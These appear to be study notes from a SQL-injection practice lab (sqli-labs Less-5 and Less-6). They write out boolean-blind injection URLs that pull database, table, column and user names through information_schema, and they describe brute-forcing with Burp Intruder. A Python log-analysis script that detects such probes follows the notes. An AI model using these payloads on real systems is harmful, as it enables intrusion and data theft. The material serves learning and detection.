1. left() function: left(database(),1)='s'
   left(a, b) takes the first b characters from the left of a; the comparison returns 1 if it is correct and 0 if it is wrong.
   select left(database(),1)='s'; tests whether the first character of the database name is 's'.
2. regexp function: select user() regexp 'r'
   user() returns root, and regexp matches root against the regular expression.
3. like function: select user() like 'ro%' matches in the same way as regexp.
4. substr(a, b, c): starting from position b of a, takes a substring of length c.
5. ascii() converts a character to its ASCII value.
   select ascii(substr((select database()),1,1)); echoes 115 directly (the ASCII code of 's').
   select ascii(substr((select database()),1,1))>110; returns 1 if the value is greater than 110 and 0 otherwise.
6. chr(number) and ord('letter') are two Python functions used to convert between a character and its ASCII value.
For the security database:
Less-05
Guess there are three columns
Guess database
Method one
http://192.168.50.254/sqli/Less-5/?id=1' and left((select database()),1)='s'--+
Capture the request in Burp and brute-force it.
After entering the URL, capture the packet in Burp and send the request to the Intruder module:
In Intruder, first clear the other positions, then mark the guessed letter as the variable:
Select the brute-force payload type, with length 1:
Threads: 50
Then crack the second letter.
- Or use a conditional test instead:
- http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr((select database()),1,1))>156--+ (nothing is returned here) (this method is wrong)
  Because no database is selected at this point, database() is empty, so no matter how large a number is written there is still echoed information.
  http://192.168.50.100/sqli/Less-5/?id=1' and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) >100 --+
  No echo here, which means the value is less than 100.
  Guess the databases one by one.
  Guess the second letter.
  Continue in this way to obtain the database name: challenge
- 1. http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) >100--+ Binary search gives all the databases; the parts in red are the variable parameters.
- 2. http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1),1,1))>1--+ Binary search again gives all the tables under security; the parts in red are the variable parameters.
- 3. http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr((select column_name from information_schema.columns where table_name=0x7573657273 limit 1,1),1,1)) >1 --+ Binary search gives the columns in users; the parts in red are the variable parameters.
- 4. http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr((select username from security.users limit 1,1),1,1))>1--+ Continue guessing to obtain the values in the column.
Less-6
Adding a single quote makes no difference.
Adding a double quote causes an error.
So this is boolean-based blind injection.
Then enumerate the columns:
3 echoes, 4 errors, so there are three columns.
- Complete injection process:
- 1. http://127.0.0.1/sqli/Less-5/?id=1" and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) >100--+ Binary search gives all the databases; the parts in red are the variable parameters.
- 2. http://127.0.0.1/sqli/Less-5/?id=1" and ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1),1,1))>1--+ Binary search again gives all the tables under security; the parts in red are the variable parameters.
- 3. http://127.0.0.1/sqli/Less-5/?id=1" and ascii(substr((select column_name from information_schema.columns where table_name=0x7573657273 limit 1,1),1,1)) >1 --+ Binary search gives the columns in users; the parts in red are the variable parameters.
- 4. http://127.0.0.1/sqli/Less-5/?id=1" and ascii(substr((select username from security.users limit 1,1),1,1))>1--+ Continue guessing to obtain the values in the column.
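As an added example that is not part of these notes: a small Python script that URL-decodes web-server access-log lines and flags clients issuing the boolean-blind probes described above (ascii(substr(...)) threshold comparisons, left((select ...)), regexp/like, information_schema lookups), reporting each client's threshold sequence so the binary search stands out. The Apache combined log format and all sample log lines are assumptions constructed here.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Signatures of the boolean-blind probes in these notes: ascii(substr(...)), left((select ...)),
# regexp/like matching and information_schema enumeration. Log format (Apache combined) is assumed.
BLIND_SIG = re.compile(
    r"ascii\s*\(\s*substr|left\s*\(\s*\(?\s*select|\bregexp\s*'|\blike\s*'|information_schema\.",
    re.IGNORECASE,
)
THRESHOLD = re.compile(r"\)\s*(?:[<>]=?|=)\s*(\d+)")          # e.g. "...,1,1))>100"
LOG_LINE = re.compile(r'(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+)')

def decode_request(line):
    """Return (client_ip, URL-decoded request target), or None if the line does not parse."""
    m = LOG_LINE.match(line)
    return (m.group(1), unquote_plus(m.group(2))) if m else None

def is_blind_probe(target):
    """True if the decoded request target carries one of the probe signatures."""
    return BLIND_SIG.search(target) is not None

def analyze(log_lines, min_probes=3):
    """Map each client sending >= min_probes probes to (probe count, sorted distinct
    thresholds); a narrowing threshold sequence is the binary search the notes describe."""
    probes = defaultdict(list)
    for line in log_lines:
        parsed = decode_request(line)
        if parsed is None:
            continue
        ip, target = parsed
        if is_blind_probe(target):
            t = THRESHOLD.search(target)
            probes[ip].append(int(t.group(1)) if t else None)
    return {ip: (len(v), sorted({x for x in v if x is not None}))
            for ip, v in probes.items() if len(v) >= min_probes}

# Constructed sample log: one client walking ascii(substr(database(),1,1)) thresholds plus a
# left() probe, one benign request, and a second client that sent only a single probe.
_PROBE = "/sqli/Less-5/?id=1%27%20and%20ascii(substr((select%20database()),1,1))%3E{}--+"
SAMPLE_LOG = [
    f'192.168.50.1 - - [10/Oct/2023:13:55:{i:02d} +0000] "GET {_PROBE.format(n)} HTTP/1.1" 200 720'
    for i, n in enumerate((100, 110, 115, 116))
] + [
    '192.168.50.1 - - [10/Oct/2023:13:55:10 +0000] "GET /sqli/Less-5/?id=1%27%20and%20'
    'left((select%20database()),1)%3D%27s%27--+ HTTP/1.1" 200 720',
    '10.0.0.5 - - [10/Oct/2023:13:56:01 +0000] "GET /sqli/Less-5/?id=1 HTTP/1.1" 200 700',
    f'10.0.0.7 - - [10/Oct/2023:13:56:30 +0000] "GET {_PROBE.format(100)} HTTP/1.1" 200 720',
]
```

Running analyze(SAMPLE_LOG) returns {'192.168.50.1': (5, [100, 110, 115, 116])}: five probes from one client whose thresholds close in on 115, the code for 's' from item 5 above, while the single probe from 10.0.0.7 stays below the reporting floor.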